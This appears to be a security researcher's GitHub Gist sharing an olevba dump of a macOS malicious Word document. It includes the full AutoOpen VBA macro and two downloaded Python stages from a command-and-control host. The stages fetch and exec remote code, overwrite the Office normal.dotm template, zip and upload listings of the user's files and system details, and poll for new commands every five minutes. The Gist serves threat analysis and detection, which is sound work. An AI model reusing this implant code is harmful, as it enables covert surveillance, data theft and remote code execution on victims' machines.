Created
March 19, 2020 18:32
-
-
Save JohnLaTwC/fc8e93e0765bca68eeec5483ded86013 to your computer and use it in GitHub Desktop.
OSX maldoc threat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: 144242e42335b015145100dbaebf902df3403244921cf81402f67778959c642e | |
| olevba 0.55.1 on Python 3.7.6 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 455e749c8f1fedbd9494d192a194b1a5b2c412244a6122f4a6a952fe15155e24 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: 455e749c8f1fedbd9494d192a194b1a5b2c412244a6122f4a6a952fe15155e24 - OLE stream: 'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| #If Mac Then | |
| #If Win64 Then | |
| Private Declare PtrSafe Function popen Lib "libc.dylib" (ByVal command As String, ByVal mode As String) As Long | |
| #Else | |
| Private Declare Function popen Lib "libc.dylib" (ByVal command As String, ByVal mode As String) As Long | |
| #End If | |
| #End If | |
| Sub AutoOpen() | |
| On Error GoTo eHandler | |
| Application.ActiveWindow.View.Type = wdPrintView | |
| ActiveDocument.Unprotect "1qaz2wsx#EDC" | |
| Dim s As Shape | |
| For Each s In ActiveDocument.Shapes | |
| s.Fill.Solid | |
| s.Delete | |
| Next | |
| Selection.WholeStory | |
| Selection.Font.Hidden = False | |
| Selection.Collapse | |
| ActiveDocument.Save | |
| #If Mac Then | |
| cmd = "import urllib2;" | |
| cmd = cmd + "exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v1')).read())" | |
| Result = popen("python -c """ + cmd + """", "r") | |
| #End If | |
| eHandler: | |
| Exit Sub | |
| End Sub | |
| ## contents of http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v1: | |
| import os; | |
| import posixpath; | |
| home_dir = posixpath.expandvars("$HOME"); | |
| normal_dotm = home_dir + "/../../../Group Containers/UBF8T346G9.Office/User Content.localized/Templates.localized/normal.dotm" | |
| os.system("rm -f '" + normal_dotm + "'"); | |
| fd = os.open(normal_dotm,os.O_CREAT | os.O_RDWR); | |
| import urllib2; | |
| data = urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=normal')).read() | |
| os.write(fd, data); | |
| os.close(fd) | |
| exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v60')).read()) | |
| ## contents of http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v60 | |
| import os | |
| import posixpath | |
| import time | |
| import urllib2 | |
| import threading | |
| from httplib import * | |
| def CollectData(): | |
| #create work directory | |
| home_dir = posixpath.expandvars("$HOME") | |
| workdir = home_dir + "/../../../Group Containers/UBF8T346G9.Office/sync" | |
| os.system("mkdir -p '" + workdir + "'") | |
| #get architecture info | |
| os.system("python -c 'import platform;print(platform.uname())' >> '" + workdir + "/arch.txt'") | |
| #get systeminfo | |
| os.system("system_profiler -detailLevel basic >> '" + workdir + "/basic.txt'") | |
| #get process list | |
| #os.system("ps -ax >> '" + workdir + "/ps.txt'") | |
| #get using app list | |
| os.system("ls -lrS /Applications >> '" + workdir + "/app.txt'") | |
| #get documents file list | |
| os.system("ls -lrS '" + home_dir + "/documents' >> '" + workdir + "/documents.txt'") | |
| #get downloads file list | |
| os.system("ls -lrS '" + home_dir + "/downloads' >> '" + workdir + "/downloads.txt'") | |
| #get desktop file list | |
| os.system("ls -lrS '" + home_dir + "/desktop' >> '" + workdir + "/desktop.txt'") | |
| #get volumes info | |
| os.system("ls -lrs /Volumes >> '" + workdir + "/vol.txt'") | |
| #get logged on user list | |
| #os.system("w -i >> '" + workdir + "/w_i.txt'") | |
| #zip gathered informations | |
| zipname = home_dir + "/../../../Group Containers/UBF8T346G9.Office/backup.zip" | |
| os.system("rm -f '" + zipname + "'") | |
| zippass = "doxujoijcs0qei09213@#$@" | |
| zipcmd = "zip -m -r '" + zipname + "' '" + workdir + "'" | |
| print(zipcmd) | |
| os.system(zipcmd) | |
| try: | |
| BODY = open(zipname, mode='rb').read() | |
| headers = {"User-Agent" : "Mozilla/5.0 compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0", "Accept-Language" : "en-US,en;q=0.9", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Content-Type" : "multipart/form-data; boundary=----7e222d1d50232"} ; | |
| boundary = "----7e222d1d50232"; | |
| postData = "--" + boundary + "\r\nContent-Disposition: form-data; name=""MAX_FILE_SIZE""\r\n\r\n1000000\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=""file""; filename=""1.txt""\r\nContent-Type: text/plain\r\n\r\n" + BODY + "\r\n--" + boundary + "--"; | |
| conn = HTTPConnection("crphone.mireene.com") | |
| conn.connect() | |
| conn.request("POST", "/plugin/editor/Templates/upload.php", postData, headers) | |
| conn.close() | |
| #delete zipped file | |
| os.system("rm -f '" + zipname + "'") | |
| except: | |
| print "error" | |
| def ExecNewCmd(): | |
| exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=new')).read()) | |
| def SpyLoop(): | |
| while True: | |
| CollectData() | |
| ExecNewCmd() | |
| time.sleep(300) | |
| main_thread = threading.Thread(target=SpyLoop) | |
| main_thread.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment